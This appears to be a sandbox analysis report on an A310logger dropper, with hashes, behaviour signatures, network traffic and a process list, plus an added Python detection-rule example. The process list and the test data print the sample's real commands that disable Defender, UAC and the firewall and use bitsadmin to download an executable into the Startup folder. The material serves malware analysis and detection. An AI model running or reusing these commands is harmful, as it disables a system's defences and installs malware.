| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/556-84-0x0000000004BE0000-0x0000000005231000-memory.dmp
memory/556-85-0x000000006EEA0000-0x000000006F44B000-memory.dmp
memory/556-86-0x0000000002460000-0x00000000030AA000-memory.dmp
memory/1972-87-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1972-91-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1972-92-0x0000000002400000-0x000000000304A000-memory.dmp
memory/1972-90-0x0000000004CA0000-0x00000000051D6000-memory.dmp
memory/276-93-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/276-97-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/276-98-0x0000000002490000-0x00000000030DA000-memory.dmp
memory/1932-99-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1932-102-0x0000000004DD0000-0x0000000005306000-memory.dmp
memory/1932-103-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1928-104-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1928-108-0x0000000004C60000-0x0000000005196000-memory.dmp
memory/1928-109-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1452-111-0x0000000000000000-mapping.dmp
memory/1928-110-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1452-115-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1452-114-0x0000000004BA0000-0x00000000050D6000-memory.dmp
memory/1452-116-0x0000000002470000-0x00000000030BA000-memory.dmp
memory/556-117-0x0000000000000000-mapping.dmp
memory/556-120-0x0000000004C50000-0x0000000005186000-memory.dmp
memory/556-121-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1504-122-0x0000000000000000-mapping.dmp
memory/556-123-0x0000000002460000-0x00000000030AA000-memory.dmp
memory/1504-127-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1504-129-0x0000000002280000-0x0000000002ECA000-memory.dmp
memory/1504-128-0x0000000004BC0000-0x00000000050F6000-memory.dmp
memory/1472-130-0x0000000000000000-mapping.dmp
memory/1472-134-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1472-133-0x0000000004B30000-0x0000000005066000-memory.dmp
memory/1472-135-0x00000000023F0000-0x000000000303A000-memory.dmp
memory/600-136-0x0000000000000000-mapping.dmp
memory/600-139-0x0000000004BE0000-0x0000000005116000-memory.dmp
memory/600-140-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/600-141-0x0000000002360000-0x0000000002FAA000-memory.dmp
memory/1520-142-0x0000000000000000-mapping.dmp
memory/1520-146-0x0000000004D20000-0x0000000005256000-memory.dmp
memory/1520-147-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1520-148-0x0000000002470000-0x00000000030BA000-memory.dmp
memory/1800-149-0x0000000000000000-mapping.dmp
memory/1800-153-0x0000000000622000-0x0000000000624000-memory.dmp
memory/1800-154-0x0000000004BB0000-0x00000000050E6000-memory.dmp
memory/1800-155-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1800-152-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/864-156-0x0000000000000000-mapping.dmp
memory/864-160-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/804-161-0x0000000000000000-mapping.dmp
memory/804-164-0x0000000004BD0000-0x0000000005106000-memory.dmp
memory/804-165-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/768-166-0x0000000000000000-mapping.dmp
memory/768-169-0x0000000004C70000-0x00000000051A6000-memory.dmp
memory/768-170-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/2032-171-0x0000000000000000-mapping.dmp
memory/768-172-0x0000000002480000-0x00000000030CA000-memory.dmp
memory/2032-176-0x0000000004C00000-0x0000000005136000-memory.dmp
memory/2032-177-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1716-178-0x0000000000000000-mapping.dmp
memory/1716-181-0x0000000004BC0000-0x00000000050F6000-memory.dmp
memory/1976-182-0x0000000000000000-mapping.dmp
memory/1716-183-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1716-184-0x00000000023F2000-0x00000000023F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\second.bat
| MD5 | 78f1eeb670df636f57ca1ef6b9b398e7 |
| SHA1 | b54fc938f44476bc3c0fff6bdcf6ce79966e5029 |
| SHA256 | a9cc3a4df688700b12c464f2e689e80f3015f86c42f6ac2d84ab898a87371201 |
| SHA512 | 36de51183d05e85999ceed8cb9b7b859488506f32b476eaa6cb48a3b79cfd7e85e2dd3a05ae63b713b2423ce07a7a05d58a0fde870b46614cae966db4c6ce6fb |
memory/1800-187-0x0000000000000000-mapping.dmp
memory/620-208-0x000000005FFF0000-0x0000000060000000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-28 18:12
Reported
2022-03-28 18:16
Platform
win10v2004-20220310-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
A310logger
UAC bypass
A310logger Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
Modifies Windows Firewall
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\525c7562.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A310Logger = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\first.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\525c7562.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\525c7562.exe
"C:\Users\Admin\AppData\Local\Temp\525c7562.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx" /o ""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Packages /download /priority foreground https://github.com/tyler617/first/releases/download/v1.0/first.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe
first.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe
first.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe
putty.exe
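The Processes list above is the dropper's whole evasion playbook in execution order: Defender exclusions for the Startup folder and for .bat/.exe, a run of Set-MpPreference switches that turn off script, archive and cloud protection and set every threat default action to 6 (Allow), EnableLUA=0 to disable UAC at next logon, the firewall off on all profiles, and a BITS download of first.exe straight into the per-user Startup folder. The Python below is an added example written for this page, not sandbox output and not code from the sample, showing how a detection engineer would turn those command lines into rules and a scored verdict. The ten malicious command lines are copied from the list above; the two benign lines, the rule names and the ATT&CK technique mapping are the editor's assumptions. It generalizes slightly beyond the page: the UAC rule also accepts the reg.exe form of the same EnableLUA change, and the Defender rule matches any -Disable* $true switch rather than only the ones this sample used.

```python
"""Detection rules for the defense-evasion and persistence chain shown in the
behavioral2 Processes list.  Added example for this page; not sandbox output
and not code from the sample.  Patterns run over a process-creation
CommandLine field (Sysmon Event ID 1, Security 4688); technique IDs are the
editor's ATT&CK mapping."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str   # ATT&CK technique ID (assumed mapping)
    command: str


# (rule name, ATT&CK ID, regex).  All patterns are matched case-insensitively.
RULES = [
    # Add-MpPreference exclusions carve the dropper's paths and extensions out of Defender.
    ("defender_exclusion_added", "T1562.001",
     r"add-mppreference\s+-exclusion(?:path|extension|process|ipaddress)\b"),
    # Set-MpPreference switches that weaken Defender: any -Disable* $true (wider than
    # the switches this sample used), MAPS/cloud off, sample submission off, default
    # threat action 6 (Allow), Controlled Folder Access and PUA off, scan day 8 (never).
    ("defender_weakened", "T1562.001",
     r"set-mppreference\s+-(?:\w*disable\w*\s+\$true|mapsreporting\s+0"
     r"|submitsamplesconsent\s+2|\w*threatdefaultaction\s+6"
     r"|enablecontrolledfolderaccess\s+disabled|puaprotection\s+disable"
     r"|scanscheduleday\s+8)\b"),
    # EnableLUA=0 turns UAC off at next logon; accepts the PowerShell form seen here
    # and the equivalent reg.exe form (assumed, not on the page).
    ("uac_disabled_enablelua", "T1548.002",
     r"enablelua\b.*?-value\s+0\b|enablelua\s+/t\s+reg_dword\s+/d\s+0\b"),
    ("firewall_all_profiles_off", "T1562.004",
     r"advfirewall\s+set\s+allprofiles\s+state\s+off\b"),
    ("bits_download", "T1197",
     r'bitsadmin(?:\.exe"?)?\s+/transfer\b.*?https?://'),
    # An executable or script path inside the per-user Startup folder.
    ("startup_folder_executable", "T1547.001",
     r'\\start menu\\programs\\startup\\[^\s"]+\.(?:exe|bat|vbs|js|ps1)\b'),
]
COMPILED = [(name, tid, re.compile(rx, re.IGNORECASE)) for name, tid, rx in RULES]


def scan(command_lines):
    """One Finding per (rule, command line) pair that matches."""
    findings = []
    for cmd in command_lines:
        for name, tid, rx in COMPILED:
            if rx.search(cmd):
                findings.append(Finding(name, tid, cmd))
    return findings


def assess(command_lines):
    """Aggregate findings into a verdict.  One Defender tweak is noisy on admin
    workstations; three or more distinct techniques from one process tree is the
    shape this sample's batch stage produces."""
    findings = scan(command_lines)
    techniques = sorted({f.technique for f in findings})
    if not findings:
        verdict = "none"
    elif len(techniques) >= 3:
        verdict = "high"
    else:
        verdict = "medium"
    return {"findings": len(findings), "techniques": techniques, "verdict": verdict}


# Ten command lines copied from the Processes list above.
SAMPLE_EVENTS = [
    r'''powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"''',
    r'powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force',
    r'powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""',
    r'powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"',
    r'powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"',
    r'powershell.exe -command "Set-MpPreference -MAPSReporting 0"',
    r'powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"',
    r'powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"',
    r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off',
    r'bitsadmin /transfer Packages /download /priority foreground https://github.com/tyler617/first/releases/download/v1.0/first.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe"',
]
# Constructed benign lines for contrast (not from the report).
BENIGN_EVENTS = [
    r'powershell.exe -command "Get-MpPreference | Select-Object DisableRealtimeMonitoring"',
    r'"C:\Windows\System32\cmd.exe" /C "echo hello"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS + BENIGN_EVENTS):
        print(f"{f.technique:10} {f.rule:28} {f.command[:70]}")
    print(assess(SAMPLE_EVENTS + BENIGN_EVENTS))
```

Run over the command-line field of your process-creation telemetry; the bitsadmin line trips two rules at once because the download target sits in the Startup folder that the first Add-MpPreference call had just excluded from scanning, which is the ordering that makes this chain work. Set-MpPreference changes are also recorded by Defender itself (operational log event 5007, configuration changed), so the same tampering can be corroborated from a second source even where command-line logging is off.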
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| FR | 2.18.109.224:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip.42.pl | udp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 188.114.97.0:443 | freegeoip.app | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
memory/3968-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs
| MD5 | bbb665124c29492698fa1d4b0c9f7d63 |
| SHA1 | 91f4d90d308fd5e25c56b797f1ee10528f2b7fc9 |
| SHA256 | 4f7b3391cb4b4ca0e55080c4e92538b680a63b39fee77fe9543b37e6a3f6edb3 |
| SHA512 | 51c10ee54cb1c64c3cf5d6e3b30e2d7e926a6de4c634af96fcfa8c5c910988db48f61f1d3c5597251bdbab56702dd1dcd26357a551c2501272072b3beb8f0ae7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx
| MD5 | e4552a689008c6fcd6cd00f3d5a5a93e |
| SHA1 | f9772e236c17c5aca5a0f7889499833d92c9f899 |
| SHA256 | a1078fb7a3acf9bbdba7a623c46c99a3b2df4687800949feafff3868d6f92bec |
| SHA512 | aaa0410cf06914de1f185d328cab0e65b2688fda84f25e1d383b81c7ac53908056edfd4ad1425897c01049e7976611ceb7140df7f5fcc25c8ecdaf8869920c67 |
memory/2804-137-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat
| MD5 | 08c4e453896495e3133c35ffc0fc8f77 |
| SHA1 | 5a544aed791b58787b94573224b12e34db1bd26a |
| SHA256 | 7b1d1e640826175729db746d7c6bcbc0f25d524a3b859107a3e3d2b08d28e458 |
| SHA512 | 2b79fdea82bb87bcd6c1e2b88480c8ebdcb76e59ea70ecff02d14ec0079eedeb7e918102d63e343de64fb13032a85e821e9b24d969c46a05f0f27975bc469e41 |
memory/4144-139-0x0000000000000000-mapping.dmp
memory/3696-140-0x0000000000000000-mapping.dmp
memory/3696-141-0x0000000002FE0000-0x0000000003016000-memory.dmp
memory/3696-142-0x0000000005C00000-0x0000000006228000-memory.dmp
memory/3696-143-0x0000000005940000-0x0000000005962000-memory.dmp
memory/3696-144-0x00000000059E0000-0x0000000005A46000-memory.dmp
memory/3696-145-0x0000000005A50000-0x0000000005AB6000-memory.dmp
memory/2804-146-0x00007FF89A3F0000-0x00007FF89A400000-memory.dmp
memory/2804-147-0x00007FF89A3F0000-0x00007FF89A400000-memory.dmp
memory/2804-148-0x00007FF89A3F0000-0x00007FF89A400000-memory.dmp
memory/2804-149-0x00007FF89A3F0000-0x00007FF89A400000-memory.dmp
memory/2804-150-0x00007FF89A3F0000-0x00007FF89A400000-memory.dmp
memory/3696-151-0x0000000006900000-0x000000000691E000-memory.dmp
memory/3696-152-0x0000000003575000-0x0000000003577000-memory.dmp
memory/3696-153-0x0000000006EB0000-0x0000000006EE2000-memory.dmp
memory/3696-154-0x000000006F290000-0x000000006F2DC000-memory.dmp
memory/3696-155-0x0000000006E90000-0x0000000006EAE000-memory.dmp
memory/3696-156-0x00000000082C0000-0x000000000893A000-memory.dmp
memory/3696-157-0x0000000007B50000-0x0000000007B6A000-memory.dmp
memory/3696-158-0x0000000007C90000-0x0000000007C9A000-memory.dmp
memory/3696-159-0x0000000007E80000-0x0000000007F16000-memory.dmp
memory/3696-160-0x0000000007E40000-0x0000000007E4E000-memory.dmp
memory/3696-161-0x0000000007F40000-0x0000000007F5A000-memory.dmp
memory/3696-162-0x0000000007F30000-0x0000000007F38000-memory.dmp
memory/996-163-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 89b6a802f2e55c6f95e9dfa3ce8a9ead |
| SHA1 | 678e272628be72c9e101a4a9bbee7c6621152b6d |
| SHA256 | 06b98a5840715810e324471d7586d2a61113e5d9acf8c1fc8e69d6aa93fd65db |
